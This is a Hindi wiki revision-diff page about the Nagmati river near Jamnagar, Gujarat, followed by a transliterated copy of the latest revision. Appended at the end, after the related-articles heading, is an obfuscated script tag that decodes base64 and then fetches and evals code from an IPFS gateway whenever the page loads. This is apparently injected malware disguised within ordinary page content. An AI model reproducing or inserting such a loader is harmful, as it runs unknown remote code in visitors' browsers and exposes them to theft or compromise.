Difference between revisions of "नागमती नदी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
(''''नागमती''' सौराष्ट्र, गुजरात के उत्तर-पश्चिमी भाग ...' के साथ नया पन्ना बनाया)
 
 
(One intermediate revision by the same user not shown)
Line 1: Line 1:
'''नागमती''' [[सौराष्ट्र]], [[गुजरात]] के उत्तर-पश्चिमी भाग अथवा हालार की [[रंगमती नदी|रंगमती]] नामक नदी की एक शाखा है। इस नदी के तट पर [[जामनगर]] बसा हुआ है।<ref>{{पुस्तक संदर्भ |पुस्तक का नाम=ऐतिहासिक स्थानावली|लेखक=विजयेन्द्र कुमार माथुर|अनुवादक= |आलोचक= |प्रकाशक=राजस्थान हिन्दी ग्रंथ अकादमी, जयपुर|संकलन= |संपादन= |पृष्ठ संख्या=487|url=}}</ref>
+
'''नागमती''' [[सौराष्ट्र]], [[गुजरात]] के उत्तर-पश्चिमी भाग अथवा [[हालार]] की [[रंगमती नदी|रंगमती]] नामक नदी की एक शाखा है। इस नदी के तट पर [[जामनगर]] बसा हुआ है।<ref>{{पुस्तक संदर्भ |पुस्तक का नाम=ऐतिहासिक स्थानावली|लेखक=विजयेन्द्र कुमार माथुर|अनुवादक= |आलोचक= |प्रकाशक=राजस्थान हिन्दी ग्रंथ अकादमी, जयपुर|संकलन= |संपादन= |पृष्ठ संख्या=487|url=}}</ref>
 +
 
 +
 
  
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1|माध्यमिक= |पूर्णता= |शोध= }}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
 
<references/>
 
<references/>
 
==संबंधित लेख==
 
==संबंधित लेख==

Latest revision as of 07:44, 15 August 2014

nagamati saurashtr, gujarat ke uttar-pashchimi bhag athava halar ki rangamati namak nadi ki ek shakha hai. is nadi ke tat par jamanagar basa hua hai.[1]


tika tippani aur sandarbh

  1. aitihasik sthanavali |lekhak: vijayendr kumar mathur |prakashak: rajasthan hindi granth akadami, jayapur |prishth sankhya: 487 |

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>